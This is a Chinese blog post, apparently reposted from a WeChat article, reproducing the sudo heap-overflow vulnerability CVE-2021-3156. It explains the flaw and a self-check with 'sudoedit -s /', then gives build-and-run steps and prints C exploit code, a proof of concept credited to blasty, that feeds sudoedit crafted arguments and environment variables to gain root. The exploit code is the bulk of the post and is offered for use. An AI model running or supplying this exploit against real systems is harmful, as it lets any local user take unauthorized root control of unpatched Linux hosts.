空觉道士'blog-

CVE-2021-3156&sudo提权复现

2021-1-30 22:17 作者:空觉道士 | 黑盒网络渗透测试 | 标签: 转载于https://mp.weixin.qq.com/s/v7mot0nCvTmsCqJhBBncuQ

目前exp在ubuntu 20.04环境下稳定运行,其他linux发行版未测试

环境已经上传至百度云盘中,请关注公众号并后台回复sudo获取下载链接。虚拟机的用户名密码为 vagrant/unicodesec

 

CVE-2021-3156: 缓冲区溢出漏洞

在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得root权限。

用户可以使用如下方法进行自查: 以非root用户登录系统,并使用命令sudoedit -s /

  • 如果响应一个以sudoedit:开头的报错,那么表明存在漏洞。
  • 如果响应一个以usage:开头的报错,那么表明补丁已经生效。

复现过程

根目录中进入CVE-2021-3156文件夹中,执行make编译项目,随后执行sudo-hax-me-a-sandwich

过程如下图所示

 

exp代码如下

 int main(int argc, char *argv[]) {
 // CTF quality exploit below.
 char *s_argv[]={
  "sudoedit",
  "-u", "root", "-s",
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\",
  "\\",
  "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB123456\\",
  NULL
 };
 char *s_envp[]={
  "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
  "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
  "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
  "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
  "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
  "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
  "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
  "\\", "\\", "\\", "\\", "\\", "\\", "\\",  
  "X/P0P_SH3LLZ_", "\\",
  "LC_MESSAGES=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
  "LC_ALL=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
  "LC_CTYPE=C.UTF-8@AAAAAAAAAAAAAA",
  NULL
 };
 printf("**** CVE-2021-3156 PoC by blasty <peter@haxx.in>\n");
 execve(SUDOEDIT_PATH, s_argv, s_envp);
 return 0;
}
 

文章作者:空觉道士
文章地址:https://www.2k8.org:443/post-237.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

发表评论:



Powered by 空觉道士'blog

CopyRight © 2009-2016 空觉道士'blog.  All rights reserved.